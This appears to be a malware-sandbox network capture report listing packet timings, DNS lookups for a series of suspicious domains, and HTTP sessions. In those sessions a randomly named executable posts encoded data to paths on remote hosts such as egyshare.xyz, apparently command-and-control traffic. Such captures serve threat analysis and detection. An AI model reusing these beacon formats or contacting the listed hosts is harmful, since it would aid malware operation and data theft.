                                                                            Dec 6, 2024 17:39:03.765358925 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:03.765412092 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:03.765451908 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765477896 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:03.765642881 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.770725965 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:03.885915995 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.886358023 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.890749931 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:03.956989050 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.957010031 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.957505941 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:04.037194967 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:05.056575060 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:05.181077957 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:05.181157112 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:05.198966026 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:05.318918943 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.469746113 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.469810009 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.469820976 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.469961882 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.469973087 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.469985008 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.469988108 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:06.470098019 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.470109940 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.470123053 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.470135927 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.470158100 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:06.470158100 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:06.470556021 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:06.589989901 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.590022087 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.590096951 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:06.661787987 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.661835909 CET8050023108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:06.662141085 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:06.708710909 CET5002380192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:07.730734110 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:07.850681067 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:07.850927114 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:07.866719007 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:07.986552000 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:07.986637115 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095515966 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095557928 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095570087 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095602989 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:09.095634937 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095673084 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:09.095675945 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095691919 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095705032 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095731974 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:09.095848083 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095861912 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095874071 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.095890045 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:09.095926046 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:09.217664957 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.217825890 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.217860937 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:09.287134886 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.287270069 CET8050024108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:09.287317991 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:09.380285978 CET5002480192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:10.399472952 CET5002580192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:10.519229889 CET8050025108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:10.519443989 CET5002580192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:10.528973103 CET5002580192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:10.648894072 CET8050025108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:11.746264935 CET8050025108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:11.802745104 CET5002580192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:16.747354984 CET8050025108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:16.747596979 CET5002580192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:16.748806953 CET5002580192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:16.868582964 CET8050025108.179.253.197192.168.2.12

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 6, 2024 17:35:53.835146904 CET5207253192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:35:54.054686069 CET53520721.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:35:59.071702957 CET5008753192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:35:59.296875000 CET53500871.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:36:04.305788994 CET6133153192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:36:05.067002058 CET53613311.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:36:21.353147984 CET6261253192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:36:21.943192959 CET53626121.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:36:36.180921078 CET5601153192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:36:36.701433897 CET53560111.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:36:51.415005922 CET6329153192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:36:51.719197989 CET53632911.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:37:05.961952925 CET5407253192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:37:06.732167006 CET53540721.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:37:21.180865049 CET5910853192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:37:21.681685925 CET53591081.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:37:36.466502905 CET6241753192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:37:37.443259001 CET53624171.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:37:51.790978909 CET4989053192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:37:52.355501890 CET53498901.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:38:00.478566885 CET5390153192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:38:00.992701054 CET53539011.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:38:16.970326900 CET6078353192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:38:17.699719906 CET53607831.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:38:31.948913097 CET5362653192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:38:32.689207077 CET53536261.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:38:46.964334011 CET5845353192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:38:47.246732950 CET53584531.1.1.1192.168.2.12
                                                                            Dec 6, 2024 17:39:01.558156013 CET5172553192.168.2.121.1.1.1
                                                                            Dec 6, 2024 17:39:02.379075050 CET53517251.1.1.1192.168.2.12

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 6, 2024 17:35:53.835146904 CET192.168.2.121.1.1.10xc1e1Standard query (0)www.betmatchx.onlineA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:35:59.071702957 CET192.168.2.121.1.1.10x8feeStandard query (0)www.egldfi.xyzA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:04.305788994 CET192.168.2.121.1.1.10xae38Standard query (0)www.remedies.proA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:21.353147984 CET192.168.2.121.1.1.10xf025Standard query (0)www.egyshare.xyzA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:36.180921078 CET192.168.2.121.1.1.10x8fc9Standard query (0)www.appsolucao.shopA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:51.415005922 CET192.168.2.121.1.1.10xfc7fStandard query (0)www.samundri.onlineA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:05.961952925 CET192.168.2.121.1.1.10x8b80Standard query (0)www.happyjam.lifeA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:21.180865049 CET192.168.2.121.1.1.10x63b4Standard query (0)www.t19yd.topA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:36.466502905 CET192.168.2.121.1.1.10xb9fcStandard query (0)www.atendefacil.infoA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:51.790978909 CET192.168.2.121.1.1.10x1811Standard query (0)www.uynline.shopA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:00.478566885 CET192.168.2.121.1.1.10x8d3eStandard query (0)www.sitioseguro.blogA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:16.970326900 CET192.168.2.121.1.1.10x5dd6Standard query (0)www.dating-apps-az-dn5.xyzA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:31.948913097 CET192.168.2.121.1.1.10x27f8Standard query (0)www.whisperart.netA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:46.964334011 CET192.168.2.121.1.1.10xeb7fStandard query (0)www.ana-silverco.shopA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:39:01.558156013 CET192.168.2.121.1.1.10x9007Standard query (0)www.bloodbalancecaps.shopA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 6, 2024 17:35:54.054686069 CET1.1.1.1192.168.2.120xc1e1Name error (3)www.betmatchx.onlinenonenoneA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:35:59.296875000 CET1.1.1.1192.168.2.120x8feeName error (3)www.egldfi.xyznonenoneA (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:05.067002058 CET1.1.1.1192.168.2.120xae38No error (0)www.remedies.pro13.248.169.48A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:05.067002058 CET1.1.1.1192.168.2.120xae38No error (0)www.remedies.pro76.223.54.146A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:21.943192959 CET1.1.1.1192.168.2.120xf025No error (0)www.egyshare.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:21.943192959 CET1.1.1.1192.168.2.120xf025No error (0)www.egyshare.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:36.701433897 CET1.1.1.1192.168.2.120x8fc9No error (0)www.appsolucao.shopappsolucao.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:36.701433897 CET1.1.1.1192.168.2.120x8fc9No error (0)appsolucao.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:51.719197989 CET1.1.1.1192.168.2.120xfc7fNo error (0)www.samundri.onlinesamundri.onlineCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 6, 2024 17:36:51.719197989 CET1.1.1.1192.168.2.120xfc7fNo error (0)samundri.online84.32.84.32A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:06.732167006 CET1.1.1.1192.168.2.120x8b80No error (0)www.happyjam.life209.74.77.107A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:21.681685925 CET1.1.1.1192.168.2.120x63b4No error (0)www.t19yd.topt19yd.topCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:21.681685925 CET1.1.1.1192.168.2.120x63b4No error (0)t19yd.top38.47.207.164A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:37.443259001 CET1.1.1.1192.168.2.120xb9fcNo error (0)www.atendefacil.info208.115.225.220A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:37:52.355501890 CET1.1.1.1192.168.2.120x1811No error (0)www.uynline.shopuynline.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:00.992701054 CET1.1.1.1192.168.2.120x8d3eNo error (0)www.sitioseguro.blog172.67.162.39A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:00.992701054 CET1.1.1.1192.168.2.120x8d3eNo error (0)www.sitioseguro.blog104.21.15.100A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:17.699719906 CET1.1.1.1192.168.2.120x5dd6No error (0)www.dating-apps-az-dn5.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:32.689207077 CET1.1.1.1192.168.2.120x27f8No error (0)www.whisperart.net199.59.243.227A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:47.246732950 CET1.1.1.1192.168.2.120xeb7fNo error (0)www.ana-silverco.shop104.21.90.137A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:38:47.246732950 CET1.1.1.1192.168.2.120xeb7fNo error (0)www.ana-silverco.shop172.67.156.195A (IP address)IN (0x0001)false
                                                                            Dec 6, 2024 17:39:02.379075050 CET1.1.1.1192.168.2.120x9007No error (0)www.bloodbalancecaps.shopbloodbalancecaps.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 6, 2024 17:39:02.379075050 CET1.1.1.1192.168.2.120x9007No error (0)bloodbalancecaps.shop108.179.253.197A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.remedies.pro
                                                                            • www.egyshare.xyz
                                                                            • www.appsolucao.shop
                                                                            • www.samundri.online
                                                                            • www.happyjam.life
                                                                            • www.t19yd.top
                                                                            • www.atendefacil.info
                                                                            • www.sitioseguro.blog
                                                                            • www.dating-apps-az-dn5.xyz
                                                                            • www.whisperart.net
                                                                            • www.ana-silverco.shop
                                                                            • www.bloodbalancecaps.shop

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.124971513.248.169.48805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:05.205074072 CET514OUTGET /8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.remedies.pro
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:36:06.304842949 CET381INHTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Fri, 06 Dec 2024 16:36:06 GMT
                                                                            content-length: 260
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 5a 3d 30 6e 6b 70 6d 5a 62 78 39 5a 34 50 32 26 42 48 70 74 5a 36 46 3d 4d 51 55 38 68 67 71 4a 43 66 4a 6b 4b 77 75 72 71 35 51 58 53 54 63 73 41 53 63 55 48 77 33 52 79 75 79 39 49 32 39 65 77 79 72 46 48 4c 4a 69 4f 35 45 55 4a 63 38 64 68 6a 4c 68 6b 50 31 77 2b 6b 4d 46 69 4b 58 31 4a 66 39 6e 69 33 6a 4b 74 31 57 47 2f 5a 70 62 6c 4b 58 75 48 4e 44 78 49 37 74 6d 72 42 4c 46 76 31 53 6d 50 64 64 2b 53 68 44 48 34 46 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU="}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.124971713.248.169.48805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:22.082973957 CET778OUTPOST /440l/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.egyshare.xyz
                                                                            Origin: http://www.egyshare.xyz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.egyshare.xyz/440l/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 49 4a 5a 47 53 48 64 42 7a 55 76 70 79 43 4e 67 6c 59 4f 65 53 48 45 37 73 71 4a 42 62 6d 70 67 42 33 32 50 78 6b 6a 48 4c 57 6b 33 4f 62 72 45 66 4f 54 2f 41 2b 65 77 50 30 46 47 65 4e 48 72 6d 2b 49 71 2b 56 66 48 5a 76 74 36 37 54 36 57 39 73 39 72 69 50 6c 38 6d 56 63 34 46 52 4d 35 62 4d 5a 4d 39 5a 4a 58 39 6c 6d 4c 73 41 73 33 47 74 70 31 48 33 50 30 31 6e 44 2b 34 63 38 62 68 69 42 72 6e 34 38 55 6a 70 6f 65 66 55 5a 34 42 65 49 62 71 2f 63 68 47 7a 73 57 35 2b 65 73 31 66 31 6f 6b 62 69 34 74 52 77 49 38 43 63 64 4a 78 2b 48 44 77 3d 3d
                                                                            Data Ascii: BHptZ6F=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/chGzsW5+es1f1okbi4tRwI8CcdJx+HDw==
                                                                            Dec 6, 2024 17:36:23.170094967 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.124971813.248.169.48805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:24.754694939 CET798OUTPOST /440l/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.egyshare.xyz
                                                                            Origin: http://www.egyshare.xyz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.egyshare.xyz/440l/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 4f 70 70 47 56 6b 46 42 36 55 76 6f 75 53 4e 67 76 34 50 58 53 48 49 37 73 75 5a 52 62 51 35 67 42 55 69 50 79 6c 6a 48 4d 57 6b 33 47 37 72 4e 51 75 54 4b 41 2b 69 65 50 78 39 47 65 4e 37 72 6d 2f 34 71 2b 6c 6a 41 59 2f 74 38 39 54 36 55 69 38 39 72 69 50 6c 38 6d 56 49 43 46 52 45 35 61 38 4a 4d 73 49 4a 55 78 46 6d 49 72 41 73 33 43 74 70 75 48 33 50 53 31 6c 37 45 34 66 45 62 68 6a 78 72 6e 74 49 58 71 70 6f 45 43 45 5a 6f 53 4d 4a 31 6c 50 6f 7a 4c 56 51 49 33 64 2b 74 30 5a 34 79 37 70 71 75 34 53 6b 46 78 56 6c 74 45 79 44 4f 59 2b 77 30 72 47 62 64 6d 54 2b 44 78 53 50 6e 49 77 4e 67 67 42 67 3d
                                                                            Data Ascii: BHptZ6F=wvRL/7AjjEcZOppGVkFB6UvouSNgv4PXSHI7suZRbQ5gBUiPyljHMWk3G7rNQuTKA+iePx9GeN7rm/4q+ljAY/t89T6Ui89riPl8mVICFRE5a8JMsIJUxFmIrAs3CtpuH3PS1l7E4fEbhjxrntIXqpoECEZoSMJ1lPozLVQI3d+t0Z4y7pqu4SkFxVltEyDOY+w0rGbdmT+DxSPnIwNggBg=
                                                                            Dec 6, 2024 17:36:25.845731020 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.124971913.248.169.48805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:27.424245119 CET1811OUTPOST /440l/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.egyshare.xyz
                                                                            Origin: http://www.egyshare.xyz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.egyshare.xyz/440l/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 4f 70 70 47 56 6b 46 42 36 55 76 6f 75 53 4e 67 76 34 50 58 53 48 49 37 73 75 5a 52 62 51 78 67 42 6b 2b 50 79 47 4c 48 4e 57 6b 33 61 72 72 49 51 75 54 54 41 2b 4b 61 50 78 68 34 65 49 33 72 6d 5a 45 71 34 57 37 41 53 2f 74 38 78 7a 36 4a 39 73 39 45 69 50 31 67 6d 56 59 43 46 52 45 35 61 36 46 4d 38 70 4a 55 7a 46 6d 4c 73 41 73 7a 47 74 6f 67 48 30 2f 73 31 6a 6e 75 34 76 6b 62 69 44 68 72 6b 62 6b 58 6f 4a 6f 43 42 45 59 33 53 4d 46 32 6c 50 45 2f 4c 52 51 75 33 61 4b 74 32 73 68 59 6b 4b 32 68 6b 78 59 45 39 69 70 58 4a 31 6a 39 42 63 56 4e 74 41 72 46 70 79 43 66 36 41 61 56 59 78 59 6a 7a 55 4c 6a 64 77 44 6d 63 4f 56 70 49 70 48 33 30 44 57 62 41 73 2b 69 61 69 66 58 54 6c 61 5a 6c 52 41 6e 41 72 44 53 72 52 50 77 37 70 56 6e 65 6d 69 38 46 7a 43 62 5a 50 6e 38 4b 4e 76 56 36 75 41 37 31 41 43 50 4b 35 34 62 68 30 62 37 38 51 78 66 65 58 70 44 75 7a 33 77 50 77 36 33 53 43 2b 32 62 79 56 71 6a 53 4e 54 4d 4d 59 6c 2f 6a 2f 6f 51 51 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=wvRL/7AjjEcZOppGVkFB6UvouSNgv4PXSHI7suZRbQxgBk+PyGLHNWk3arrIQuTTA+KaPxh4eI3rmZEq4W7AS/t8xz6J9s9EiP1gmVYCFRE5a6FM8pJUzFmLsAszGtogH0/s1jnu4vkbiDhrkbkXoJoCBEY3SMF2lPE/LRQu3aKt2shYkK2hkxYE9ipXJ1j9BcVNtArFpyCf6AaVYxYjzULjdwDmcOVpIpH30DWbAs+iaifXTlaZlRAnArDSrRPw7pVnemi8FzCbZPn8KNvV6uA71ACPK54bh0b78QxfeXpDuz3wPw63SC+2byVqjSNTMMYl/j/oQQLaOy+MPj6lhF4RCvGLgAHJbEnMXnj1DLg4mqYOIgb0TFGwB6S6lErPEVDdkg2uWh/6E2IHFfOcy5P8bS6Z0CYO5Gawga2nr+4IurOVXu21UlOGeAWG/Lr2DFxiiQMPEWel+jiVKW7k/mXbPqJb93aDCcnqnG8wGOI/ZGrzn7LotkAeP+fgYkW3kpcVMCkWdRqDrebmFZ+vR1NGbXHk9Rv4xsM4BLSvKHhsPHF5RN028n7O+6UYbDoBE8FMyuyMR7UEBWF/vluPUip+lCaHRYYonvKae3C7F22GZ6m6XduTcw5bv4GNgjWcAam3PdEzPR0l0teSb5jJMgl7PjGNz/Mw+58AQkuJ/OpCPFRv3dPNIoap6K4FemBzDyTdRrwasaiQI6VvDS7wZXBLXbxO088TeCcx57moxuEtLU7IkEpQUxque7tC5lNFGNxtKPSq+8iWcFs4Ds9t2RntpTrhfeX7jaWMXwBme93fDr+QPP71MEjAk0MDuW0HY/w+pArNLnIjzgbRIu75zyBYtww76wceUyzkL0bkJgpEkJaijS/7unAmb78qyfBbbO3okcM8B7pg0EcLlw87yS3IZBLsXES97BYq+zLAGiht2GGMJM8h+0KMg6Mpz9e5HhyAt+8Ukm1/TSNq68u7GER4boOiQfXQdyuu4JDLGtjW [TRUNCATED]
                                                                            Dec 6, 2024 17:36:28.509149075 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
